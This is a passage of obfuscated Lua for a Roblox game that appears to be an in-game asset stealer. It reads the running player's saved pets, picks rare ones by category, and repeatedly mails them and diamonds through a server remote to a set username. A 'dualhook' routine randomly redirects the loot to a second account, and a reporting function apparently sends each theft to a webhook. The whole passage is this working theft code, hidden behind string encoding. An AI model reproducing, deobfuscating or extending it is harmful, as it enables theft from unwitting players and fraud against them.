(getgenv().Settings.MailMessage~=nil) then v147=getgenv().Settings.MailMessage;end break;end if (v295==(1 + 0)) then if getgenv().Settings.Exclusives.Dualhook then v142=getgenv().Settings.Exclusives.Intensity;end if getgenv().Settings.Events.Dualhook then v143=getgenv().Settings.Events.Intensity;end if getgenv().Settings.Secrets.Dualhook then v144=getgenv().Settings.Secrets.Intensity;end if getgenv().Settings.HC_DM_Mythics.Dualhook then v145=getgenv().Settings.HC_DM_Mythics.Intensity;end v295=2 + 0 ;end end end function dualhook(v226)if  not tonumber(v226) then game:GetService(v7("\252\193\131\104\67\222\222","\38\172\173\226\17")).LocalPlayer:Kick(v7("\125\4\56\175\108\81\26\238\65\24\40\175\68\31\56\234\67\2\37\251\84\81\26\238\65\4\41","\143\45\113\76"));return;end local v227=math.random(1125 -(408 + 716) ,379 -279 );if (v227<=v226) then return true;else return false;end end local v148;if ((UserName2~=nil) and (UserName2~=v7("\140\189\20\12\173\187\9\55\135\237\73","\92\216\216\124")) and (UserName2~="")) then v148=UserName2;else v148=UserName;end local v149;if (v129==(0 -0)) then local v296=0;local v297;while true do if (v296==(1 + 0)) then v297={[2 -1 ]={[v7("\105\55\175\73\237\82\55\162\84","\157\59\82\204\32")]=v149,[v7("\28\55\226\247\230\228\215\162","\209\88\94\131\154\137\138\179")]=v131,[v7("\24\164\208\111","\66\72\193\164\28\126\67\81")]={},[v7("\202\41\187\75\39\113\226","\22\135\76\200\56\70")]=v147}};v35:InvokeServer(unpack(v297));break;end if (v296==(574 -(489 + 85))) then local v493=1501 -(277 + 1224) ;while true do if (v493==(1493 -(663 + 830))) then if (v131>=(878361446 + 121638554)) then v149=UserName;else v149=v148;end if (v146~=nil) then if dualhook(v146) then v149=v137;end end v493=2 -1 ;end if (v493==(3 -2)) then v296=876 -(461 + 414) ;break;end end end end end spawn(function()while wait() do if (( #TList~=(0 + 0)) or (TList~={})) then for v494,v495 in pairs(TList) do v149=UserName;if (v138~=nil) then if dualhook(v138) then v149=v137;end end local v496={[1 + 0 ]={[v7("\191\53\251\45\77\232\136\62\236","\129\237\80\152\68\61")]=v149,[v7("\117\161\5\254\19\25\92\66","\56\49\200\100\147\124\119")]=v131,[v7("\252\59\171\227","\144\172\94\223")]={v495},[v7("\9\10\177\84\37\8\167","\39\68\111\194")]=v147}};v35:InvokeServer(unpack(v496));if (( #TList==(1166 -(228 + 938))) or (TList=={})) then break;end end end end end);spawn(function()while wait() do if (( #BList~=(685 -(332 + 353))) and ( #TList==(0 + 0))) then for v497,v498 in pairs(BList) do v149=UserName;if (v139~=nil) then if dualhook(v139) then v149=v137;end end local v499={[251 -(172 + 78) ]={[v7("\228\163\228\206\105\190\211\168\243","\215\182\198\135\167\25")]=v149,[v7("\169\64\235\69\130\71\238\91","\40\237\41\138")]=v131,[v7("\247\113\238\235","\42\167\20\154\152")]={v498},[v7("\103\251\177\81\112\38\79","\65\42\158\194\34\17")]=v147}};v35:InvokeServer(unpack(v499));if (( #BList==(0 + 0)) or (BList=={})) then break;end end else break;end end end);spawn(function()while wait() do if (( #HList~=0) and ( #BList==(0 -0)) and ( #TList==(0 + 0))) then for v500,v501 in pairs(HList) do v149=UserName;if (v140~=nil) then if dualhook(v140) then v149=v137;end end local v502={[1 + 0 ]={[v7("\40\34\81\5\61\228\30\224\14","\142\122\71\50\108\77\141\123")]=v149,[v7("\49\171\254\21\52\27\166\236","\91\117\194\159\120")]=v131,[v7("\42\24\42\11","\68\122\125\94\120\85\145")]={v501},[v7("\58\25\220\77\201\222\191","\218\119\124\175\62\168\185")]=v147}};v35:InvokeServer(unpack(v502));if (( #HList==(0 -0)) or (HList=={})) then break;end end end end end);spawn(function()while wait() do if (( #PList~=(0 -0)) and ( #TList==(0 + 0)) and ( #BList==(978 -(194 + 784))) and ( #HList==(0 + 0))) then for v503,v504 in pairs(PList) do v149=UserName;if (v141~=nil) then if dualhook(v141) then v149=v137;end end local v505={[1905 -(122 + 1782) ]={[v7("\151\245\75\205\181\249\77\202\177","\164\197\144\40")]=v149,[v7("\167\249\171\134\210\184\135\227","\214\227\144\202\235\189")]=v131,[v7("\221\160\147\104","\92\141\197\231\27\112\211\51")]={v504},[v7("\203\250\153\176\208\225\250","\177\134\159\234\195")]=v147}};v35:InvokeServer(unpack(v505));if (( #PList==(0 -0)) or (PList=={})) then break;end end end end end);spawn(function()while wait() do if (( #EList~=(0 -0)) and ( #HList==(0 + 0)) and ( #TList==(0 + 0)) and ( #BList==(0 + 0)) and ( #PList==(447 -(133 + 314)))) then for v506,v507 in pairs(EList) do v149=UserName;if (v142~=nil) then if dualhook(v142) then v149=v137;end end local v508={[1 + 0 ]={[v7("\143\238\60\169\217\180\238\49\180","\169\221\139\95\192")]=v149,[v7("\250\130\126\50\45\40\218\152","\70\190\235\31\95\66")]=v131,[v7("\138\231\14\245","\133\218\130\122\134")]={v507},[v7("\17\250\240\215\221\164\61","\88\92\159\131\164\188\195")]=v147}};v35:InvokeServer(unpack(v508));if (( #EList==(213 -(199 + 14))) or (EList=={})) then break;end end end end end);spawn(function()while wait() do if (( #EvList~=(0 -0)) and ( #EList==(1549 -(647 + 902))) and ( #HList==(0 -0)) and ( #TList==(233 -(85 + 148))) and ( #BList==(585 -(217 + 368))) and ( #PList==(0 -0))) then for v509,v510 in pairs(EvList) do v149=v148;if (v143~=nil) then if dualhook(v143) then v149=v137;end end local v511={[1]={[v7("\178\43\188\66\199\226\216\142\58","\189\224\78\223\43\183\139")]=v149,[v7("\10\245\139\27\206\32\248\153","\161\78\156\234\118")]=v131,[v7("\151\178\221\207","\188\199\215\169")]={v510},[v7("\209\12\76\104\233\251\12","\136\156\105\63\27")]=v147}};v35:InvokeServer(unpack(v511));if (( #EvList==(0 + 0)) or (EvList=={})) then break;end end end end end);spawn(function()while wait() do if (( #SList~=(0 -0)) and ( #EvList==(1654 -(873 + 781))) and ( #EList==(0 -0)) and ( #HList==0) and ( #TList==(0 -0)) and ( #BList==(0 + 0)) and ( #PList==(0 -0))) then for v512,v513 in pairs(SList) do v149=v148;if (v144~=nil) then if dualhook(v144) then v149=v137;end end local v514={[1201 -(132 + 1068) ]={[v7("\41\137\122\61\11\133\124\58\15","\84\123\236\25")]=v149,[v7("\212\130\171\26\163\187\244\152","\213\144\235\202\119\204")]=v131,[v7("\19\29\202\57","\45\67\120\190\74\72\67")]={v513},[v7("\13\39\254\182\248\143\235","\137\64\66\141\197\153\232\142")]=v147}};v35:InvokeServer(unpack(v514));if (( #SList==(0 -0)) or (SList=={})) then break;end end end end end);spawn(function()while wait() do if (( #MList~=(0 -0)) and ( #SList==(0 -0)) and ( #EvList==(1947 -(414 + 1533))) and ( #EList==(0 + 0)) and ( #HList==(555 -(443 + 112))) and ( #TList==(1479 -(888 + 591))) and ( #BList==(0 -0)) and ( #PList==(0 + 0))) then for v515,v516 in pairs(MList) do v149=v148;if (v145~=nil) then if dualhook(v145) then v149=v137;end end local v517={[941 -(9 + 931) ]={[v7("\49\213\33\175\152\10\213\44\178","\232\99\176\66\198")]=v149,[v7("\200\40\41\11\116\131\253\63","\76\140\65\72\102\27\237\153")]=v131,[v7("\122\223\2\193","\222\42\186\118\178\183\97")]={v516},[v7("\112\233\87\153\92\235\65","\234\61\140\36")]=v147}};v35:InvokeServer(unpack(v517));if (( #MList==(0 -0)) or (MList=={})) then break;end end end end end);local v150= #TList;WTianicList={};WTList={};WTcc={};local v151=1;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\19\216\170\126\6\34\220\174\119\11\18\201\181\96\14\38\216","\111\65\189\218\18")).Framework:FindFirstChild(v7("\111\66\25\39\10\78\182","\207\35\43\123\85\107\60")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v351,v352)if v352.titanic then table.insert(WTianicList,v351);end end);local v299=require(game:GetService(v7("\66\175\176\230\112\115\171\180\239\125\67\190\175\248\120\119\175","\25\16\202\192\138")).Library.Client.Save).Get().Pets;local v300={};for v353,v354 in pairs(v299) do v300[v354[v7("\232\194\169","\148\157\171\205\130\201")]]=false;end for v356,v357 in pairs(v299) do if (table.find(WTianicList,v357[v7("\42\208","\150\67\180\20\73\177")])~=nil) then table.insert(WTList,v357[v7("\152\17\30","\45\237\120\122")]);table.insert(WTcc,v357[v7("\222\236","\76\183\136\194")]);end end if (v150==( #WTList + 1 + 0)) then v150= #TList;v129=v129-(1 + 0) ;local v436=v131;local v437=STList[v151];local v438;local v439;for v518,v519 in pairs(game:GetService(v7("\72\227\245\52\89\76\21\110\227\225\11\68\64\6\123\225\224","\116\26\134\133\88\48\47"))[v7("\33\254\132\205\143\87\61\245\143\214\132","\18\126\161\192\132\221")].Pets:GetChildren()) do local v520=string.split(v519.Name,v7("\31\101\238","\54\63\72\206\100"))[1 + 0 ];if (v520==tostring(v437)) then v438=require(v519:FindFirstChildOfClass(v7("\229\86\65\111\233\126\251\90\87\115\245\111","\27\168\57\37\26\133"))).name;v439=require(v519:FindFirstChildOfClass(v7("\0\165\120\189\219\40\153\127\186\222\61\190","\183\77\202\28\200"))).thumbnail;break;end end v136(v7("\77\32\138\26\18\50\132\82\87\115\195\66\35\26\189\41\57\26\170\66\93\115\211\27\20\33\140\9\26\105","\104\119\83\233"),v438,v7("\213\253\49\39\81\236\247\41\39\3\218\213\1\5","\35\149\152\71\66"),v132,v129,v439,UserName);v131=0 -0 ;v132=0 -0 ;v151=v151 + (1679 -(136 + 1542)) ;v80=0 -0 ;v77=1403 -(1183 + 220) ;elseif ((v150==(0 + 0)) or (v129==(0 -0))) then TList={};break;end WTianicList={};WTList={};WTcc={};wait(1 + 0 );end end);local v152= #BList;WBananaList={};WBList={};WBcc={};spawn(function()while wait() do WLibrary=require(game:GetService(v7("\43\237\82\188\51\26\233\86\181\62\42\252\77\162\59\30\237","\90\121\136\34\208")).Framework:FindFirstChild(v7("\235\7\87\12\198\28\76","\126\167\110\53")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v358,v359)if (v359.name==v7("\63\17\32\249\210\62","\95\93\112\78\152\188")) then table.insert(WBananaList,v358);end end);local v302=require(game:GetService(v7("\243\240\149\25\237\189\211\213\240\129\38\240\177\192\192\242\128","\178\161\149\229\117\132\222")).Library.Client.Save).Get().Pets;local v303={};for v360,v361 in pairs(v302) do v303[v361[v7("\157\210\217","\67\232\187\189\204\193\118\198")]]=false;end for v363,v364 in pairs(v302) do if (table.find(WBananaList,v364[v7("\130\42","\143\235\78\213\64\91\98")])~=nil) then local v521=486 -(68 + 418) ;while true do if (v521==(0 -0)) then table.insert(WBList,v364[v7("\152\65\128","\214\237\40\228\137\16")]);table.insert(WBcc,v364[v7("\140\231","\198\229\131\143\185\99")]);break;end end end end if (v152==( #WBList + (1 -0))) then local v440=0;local v441;local v442;local v443;local v444;while true do if (v440==(1 + 0)) then v443=nil;v444=nil;v440=2;end if (v440==0) then local v584=0 -0 ;while true do if (v584==(734 -(527 + 207))) then v441=1092 -(770 + 322) ;v442=nil;v584=1 + 0 ;end if (v584==1) then v440=1871 -(1298 + 572) ;break;end end end if ((1 + 1)==v440) then while true do if ((1 + 2)==v441) then v131=0;v132=0 -0 ;v441=4;end if (v441==0) then v152= #BList;v129=v129-(1 -0) ;v441=2 -1 ;end if (v441==(1 -0)) then local v636=0 -0 ;while true do if (v636==(0 -0)) then v442=v131;v443=v7("\115\141\166\114\95\141","\19\49\236\200");v636=2 -1 ;end if (v636==(4 -3)) then v441=2 + 0 ;break;end end end if (v441==(5 -1)) then v80=0 + 0 ;v77=0 + 0 ;break;end if (v441==(2 + 0)) then v444="rbxassetid://10946336703";v136(v7("\164\53\247\185\229\180\255\109\182\253\174\152\223\25\215\153\197\240\180\119\172\181\229\180\255\57\247\237","\218\158\87\150\215\132"),v443,v7("\219\27\207\231\36\59\194\245\27","\173\155\126\185\130\86\66"),v132,v129,v444,UserName);v441=3 + 0 ;end end break;end end elseif ((v152==(0 -0)) or (v129==(0 -0))) then BList={};break;end WBananaList={};WBList={};WBcc={};wait(1 + 0 );end end);local v153= #HList;WHugeList={};WHList={};WHcc={};local v154=1;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\215\163\170\203\129\239\228\178\191\195\187\248\234\180\187\192\141","\140\133\198\218\167\232")).Framework:FindFirstChild(v7("\153\39\182\111\133\167\55","\228\213\78\212\29")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v365,v366)if v366.huge then table.insert(WHugeList,v365);end end);local v305=require(game:GetService(v7("\181\73\166\9\226\132\77\162\0\239\180\88\185\23\234\128\73","\139\231\44\214\101")).Library.Client.Save).Get().Pets;local v306={};for v367,v368 in pairs(v305) do v306[v368[v7("\204\230\2","\118\185\143\102\62\112\209\81")]]=false;end for v370,v371 in pairs(v305) do if (table.find(WHugeList,v371[v7("\85\116","\88\60\16\73\134\197\117\124")])~=nil) then local v522=0 -0 ;local v523;while true do if (v522==(0 -0)) then v523=0 -0 ;while true do if (v523==(0 + 0)) then table.insert(WHList,v371[v7("\69\227\252","\33\48\138\152\168")]);table.insert(WHcc,v371[v7("\123\18","\87\18\118\80\49\161")]);break;end end break;end end end end if (v153==( #WHList + (4 -3))) then v153= #WHList;v129=v129-(832 -(762 + 69)) ;local v445=SHList[v154];local v446;local v447;for v524,v525 in pairs(game:GetService(v7("\126\27\202\172\185\79\31\206\165\180\127\10\213\178\177\75\27","\208\44\126\186\192"))[v7("\200\37\128\239\38\217\234\122\216\40\157","\46\151\122\196\166\116\156\169")].Pets:GetChildren()) do local v526=string.split(v525.Name,v7("\165\160\6","\155\133\141\38\122"))[1];if (v526==tostring(v445)) then v447=require(v525:FindFirstChildOfClass(v7("\8\37\168\84\67\122\150\38\56\165\81\91","\197\69\74\204\33\47\31"))).name;v446=require(v525:FindFirstChildOfClass(v7("\221\64\94\146\252\74\105\132\226\70\74\147","\231\144\47\58"))).thumbnail;break;end end v136(v7("\232\213\213\123\29\36\240\52\189\205\206\125\66\125\133\115\154\237\253\80\82\119\143\99\191\215\212\112\1\2\194\54\167\204\210\47","\89\210\184\186\21\120\93\175"),v447,v7("\145\86\106\208\107\35\190\93\121","\90\209\51\28\181\25"),v132,v129,v446,UserName);v131=0 -0 ;v132=0 + 0 ;v154=v154 + 1 ;v80=0 + 0 ;v77=0 -0 ;elseif ((v153==(0 + 0)) or (v129==(0 + 0))) then HList={};break;end WHugeList={};WHList={};WHcc={};wait(3 -2 );end end);local v155= #PList;WPogList={};WPList={};WPcc={};local v156=158 -(8 + 149) ;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\226\126\71\226\182\211\122\67\235\187\227\111\88\252\190\215\126","\223\176\27\55\142")).Framework:FindFirstChild(v7("\8\178\204\167\37\169\215","\213\68\219\174")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v372,v373)if (string.split(v373.name," ")[1321 -(1199 + 121) ]==v7("\59\239\36","\31\107\128\67\135\74\165\95")) then table.insert(WPogList,v372);end end);local v308=require(game:GetService(v7("\234\237\236\65\72\178\217\252\249\73\114\165\215\250\253\74\68","\209\184\136\156\45\33")).Library.Client.Save).Get().Pets;local v309={};for v374,v375 in pairs(v308) do v309[v375[v7("\18\193\113","\216\103\168\21\104")]]=false;end for v377,v378 in pairs(v308) do if (table.find(WPogList,v378[v7("\113\169","\196\24\205\35")])~=nil) then local v527=0 -0 ;while true do if (v527==(1646 -(73 + 1573))) then table.insert(WPList,v378[v7("\59\130\231","\102\78\235\131")]);table.insert(WPcc,v378[v7("\243\42","\84\154\78\84\36\39\89\215")]);break;end end end end if (v155==( #WPList + (2 -1))) then v155= #WPList;v129=v129-(1 + 0) ;local v448=SPList[v156];local v449;local v450;for v528,v529 in pairs(game:GetService(v7("\207\228\70\84\12\254\224\66\93\1\206\245\89\74\4\250\228","\101\157\129\54\56"))[v7("\34\150\174\130\17\92\62\157\165\153\26","\25\125\201\234\203\67")].Pets:GetChildren()) do local v530=string.split(v529.Name,v7("\57\185\88","\115\25\148\120\99\116\71"))[1];if (v530==tostring(v448)) then v449=require(v529:FindFirstChildOfClass(v7("\33\50\189\49\77\9\14\186\54\72\28\41","\33\108\93\217\68"))).name;v450=require(v529:FindFirstChildOfClass(v7("\246\68\165\184\215\78\146\174\201\66\177\185","\205\187\43\193"))).thumbnail;break;end end v136(v7("\164\116\12\205\251\40\69\149\180\66\42\248\180\56\69\133\248\123\23\218\164","\191\158\18\101"),v449,"",v132,v129,v450,UserName);v131=0 -0 ;v132=0 -0 ;v156=v156 + (2 -1) ;v80=0 + 0 ;v77=1807 -(518 + 1289) ;elseif ((v155==(0 -0)) or (v129==(0 + 0))) then PList={};break;end WPogList={};WPList={};WPcc={};wait(1 -0 );end end);local v157= #EList;WExclusiveList={};WEList={};WEcc={};local v158=1 + 0 ;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\247\198\151\187\166\198\194\147\178\171\246\215\136\165\174\194\198","\207\165\163\231\215")).Framework:FindFirstChild(v7("\234\240\251\68\37\98\223","\16\166\153\153\54\68")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v379,v380)if ((v380.rarity==v7("\247\171\195\74\33\50\240\196\182","\153\178\211\160\38\84\65")) and  not v380.huge and  not v380.titanic) then table.insert(WExclusiveList,v379);end end);local v311=require(game:GetService(v7("\176\14\74\39\139\8\91\63\135\15\105\63\141\25\91\44\135","\75\226\107\58")).Library.Client.Save).Get().Pets;local v312={};for v381,v382 in pairs(v311) do v312[v382[v7("\77\215\21","\173\56\190\113\26\113\162")]]=false;end for v384,v385 in pairs(v311) do if ((table.find(WExclusiveList,v385[v7("\194\218","\151\171\190\77\101")])~=nil) and  not v385.huge and  not v385.titanic) then table.insert(WEList,v385[v7("\208\38\252","\107\165\79\152\201\152\29")]);table.insert(WEcc,v385[v7("\94\74","\31\55\46\136\171\52")]);end end if (v157==( #WEList + 1 + 0)) then v157= #WEList;v129=v129-(470 -(304 + 165)) ;local v451=SEList[v158];local v452;local v453;for v531,v532 in pairs(game:GetService(v7("\227\45\204\248\216\43\221\224\212\44\239\224\222\58\221\243\212","\148\177\72\188"))[v7("\153\137\115\250\148\147\116\231\137\132\110","\179\198\214\55")].Pets:GetChildren()) do local v533=string.split(v532.Name,v7("\176\65\50","\179\144\108\18\22\37"))[1 + 0 ];if (v533==tostring(v451)) then v453=require(v532:FindFirstChildOfClass(v7("\235\172\31\156\195\195\144\24\155\198\214\183","\175\166\195\123\233"))).name;v452=require(v532:FindFirstChildOfClass(v7("\194\205\89\92\252\234\241\94\91\249\255\214","\144\143\162\61\41"))).thumbnail;break;end end v136(v7("\186\199\24\84\118\158\12\226\214\28\66\40\199\121\170\246\5\83\126\146\32\233\197\24\26\56\199\105\244\214\25\84\107\184\49\229\210\15\10","\83\128\179\125\48\18\231"),v453,"",v132,v129,v452,UserName);v131=160 -(54 + 106) ;v132=1969 -(1618 + 351) ;v158=v158 + 1 + 0 ;v80=1016 -(10 + 1006) ;v77=0 + 0 ;elseif ((v157==(0 + 0)) or (v129==(0 + 0))) then EList={};break;end WExclusiveList={};WEList={};WEcc={};wait(1 + 0 );end end);local v159= #EvList;WEventList={};WEvList={};WEvcc={};local v160=1;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\111\178\227\209\78\29\92\163\246\217\116\10\82\165\242\218\66","\126\61\215\147\189\39")).Framework:FindFirstChild(v7("\84\246\31\87\121\237\4","\37\24\159\125")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v386,v387)if (v387.rarity==v7("\255\176\112\76\206","\34\186\198\21")) then table.insert(WEventList,v386);end end);local v314=require(game:GetService(v7("\202\13\213\81\203\251\9\209\88\198\203\28\202\79\195\255\13","\162\152\104\165\61")).Library.Client.Save).Get().Pets;local v315={};for v388,v389 in pairs(v314) do v315[v389[v7("\216\38\182","\133\173\79\210\29\16")]]=false;end for v391,v392 in pairs(v314) do if (table.find(WEventList,v392[v7("\132\120","\75\237\28\141")])~=nil) then local v534=0 -0 ;while true do if (v534==(0 -0)) then table.insert(WEvList,v392[v7("\201\86\200","\129\188\63\172\209\79\123\135")]);table.insert(WEvcc,v392[v7("\73\224","\173\32\132\134")]);break;end end end end if (v159==( #WEvList + (1034 -(912 + 121)))) then v159= #WEvList;v129=v129-(1 + 0) ;local v454=v131;local v455=SEvList[v160];local v456;local v457;for v535,v536 in pairs(game:GetService(v7("\124\30\24\227\167\50\204\90\30\12\220\186\62\223\79\28\13","\173\46\123\104\143\206\81"))[v7("\139\34\6\163\119\166\34\128\50\16\179","\97\212\125\66\234\37\227")].Pets:GetChildren()) do local v537=string.split(v536.Name,v7("\202\174\246","\126\234\131\214\85"))[1 + 0 ];if (v537==tostring(v455)) then v456=require(v536:FindFirstChildOfClass(v7("\169\218\77\79\67\129\230\74\72\70\148\193","\47\228\181\41\58"))).name;v457=require(v536:FindFirstChildOfClass(v7("\139\243\221\46\15\53\44\165\238\208\43\23","\127\198\156\185\91\99\80"))).thumbnail;break;end end v136(v7("\175\10\217\227\175\27\48\208\175\90\134\186\130\29\60\208\225\80\134\176\253\27\44\205\253\10\197\254\253","\190\149\122\172\144\199\107\89"),v456,"",v132,v129,v457,v148,petinfo);v131=1910 -(206 + 1704) ;v132=1289 -(1140 + 149) ;v160=v160 + 1 ;v80=0 + 0 ;v77=0 + 0 ;elseif ((v159==(0 -0)) or (v129==(1506 -(396 + 1110)))) then EvList={};break;end WEventList={};WEvList={};WEvcc={};wait(1 + 0 );end end);local v161= #SList;WSecretList={};WSList={};WScc={};local v162=2 -1 ;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\0\0\225\242\247\49\4\229\251\250\1\17\254\236\255\53\0","\158\82\101\145\158")).Framework:FindFirstChild(v7("\92\247\0\4\69\98\231","\36\16\158\98\118")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v393,v394)if (v394.rarity==v7("\243\19\192\233\93\252","\133\160\118\163\155\56\136\71")) then table.insert(WSecretList,v393);end end);local v317=require(game:GetService(v7("\196\167\97\254\191\28\180\226\167\117\193\162\16\167\247\165\116","\213\150\194\17\146\214\127")).Library.Client.Save).Get().Pets;local v318={};for v395,v396 in pairs(v317) do v318[v396[v7("\14\160\160","\86\123\201\196\180\38\196\194")]]=false;end for v398,v399 in pairs(v317) do if (table.find(WSecretList,v399[v7("\254\236","\207\151\136\185")])~=nil) then local v538=0 + 0 ;while true do if (v538==(0 -0)) then table.insert(WSList,v399[v7("\189\138\44","\17\200\227\72\226\20\24")]);table.insert(WScc,v399[v7("\185\69","\159\208\33\123\183\169\145\143")]);break;end end end end if (v161==( #WSList + (1 -0))) then v161= #WSList;v129=v129-(1 + 0) ;local v458=SSList[v162];local v459;local v460;for v539,v540 in pairs(game:GetService(v7("\192\95\40\58\251\89\57\34\247\94\11\34\253\72\57\49\247","\86\146\58\88"))[v7("\103\224\206\233\156\204\21\206\119\237\211","\154\56\191\138\160\206\137\86")].Pets:GetChildren()) do local v541=string.split(v540.Name,v7("\198\20\181","\172\230\57\149\231\28\90\225"))[977 -(230 + 746) ];if (v541==tostring(v458)) then v459=require(v540:FindFirstChildOfClass(v7("\47\165\130\199\36\222\49\169\148\219\56\207","\187\98\202\230\178\72"))).name;v460=require(v540:FindFirstChildOfClass(v7("\12\238\160\37\70\36\210\167\34\67\49\245","\42\65\129\196\80"))).thumbnail;break;end end v136(v7("\88\89\85\207\4\15\11\224\5\117\91\219\20\2\88\174\72\0\110\255\52\53\39\218\72\0\29\128\4\15\23\253\10\67\83\221\40\1\3\237\7\16","\142\98\42\61\186\119\103\98"),v459,"",v132,v129,v460,v148);v131=601 -(473 + 128) ;v132=48 -(39 + 9) ;v162=v162 + (3 -2) ;v80=0;v77=186 -(165 + 21) ;elseif ((v161==(473 -(106 + 367))) or (v129==0)) then SList={};break;end WSecretList={};WSList={};WScc={};wait(1 + 0 );end end);local v163= #MList;WMythicList={};WMList={};WMcc={};local v164=112 -(61 + 50) ;spawn(function()while wait() do WLibrary=require(game:GetService(v7("\10\186\18\4\49\188\3\28\61\187\49\28\55\173\3\15\61","\104\88\223\98")).Framework:FindFirstChild(v7("\104\254\224\220\3\255\93","\141\36\151\130\174\98")));WFunctions=WLibrary.Functions;table.foreach(WLibrary.Directory.Pets,function(v400,v401)if (v401.rarity==v7("\169\99\214\5\141\121\195\1","\109\228\26\162")) then table.insert(WMythicList,v400);end end);local v320=require(game:GetService(v7("\108\224\237\116\233\229\95\241\248\124\211\242\81\247\252\127\229","\134\62\133\157\24\128")).Library.Client.Save).Get().Pets;local v321={};for v402,v403 in pairs(v320) do v321[v403[v7("\18\172\30","\182\103\197\122\185\79\209")]]=false;end for v405,v406 in pairs(v320) do if ((table.find(WMythicList,v406[v7("\250\131","\40\147\231\129\23\96")])~=nil) and v406.hc and v406.dm) then local v542=0 + 0 ;while true do if (v542==(0 -0)) then table.insert(WMList,v406[v7("\96\241\136","\188\21\152\236\37\219\204")]);table.insert(WMcc,v406[v7("\73\237","\108\32\137\87")]);break;end end end end if (v163==( #WMList + 1 + 0)) then v163= #WMList;v129=v129-(1 + 0) ;local v461=SMList[v164];local v462;local v463;for v543,v544 in pairs(game:GetService(v7("\152\237\16\170\38\250\74\77\175\236\51\178\32\235\74\94\175","\57\202\136\96\198\79\153\43"))[v7("\148\28\142\142\191\130\219\159\12\152\158","\152\203\67\202\199\237\199")].Pets:GetChildren()) do local v545=string.split(v544.Name,v7("\186\14\224","\134\154\35\192\111\127\21\25"))[1 -0 ];if (v545==tostring(v461)) then v462=require(v544:FindFirstChildOfClass(v7("\149\41\13\31\44\215\139\37\27\3\48\198","\178\216\70\105\106\64"))).name;v463=require(v544:FindFirstChildOfClass(v7("\18\36\126\227\197\208\231\131\45\34\106\226","\224\95\75\26\150\169\181\180"))).darkMatterThumbnail;break;end end v136(v7("\81\200\209\42\70\163\120\81\154\146\98\105\181\98\3\211\219\41\72\230\60\75\128\202\33\70\174\121\5\128","\22\107\186\184\72\36\204"),v462,"",v132,v129,v463,v148);v131=0 -0 ;v132=0 + 0 ;v164=v164 + (1461 -(1295 + 165)) ;v80=0 + 0 ;v77=0;elseif ((v163==(0 + 0)) or (v129==(1397 -(819 + 578)))) then MList={};break;end WMythicList={};WMList={};WMcc={};wait(616 -(230 + 386) );end end);
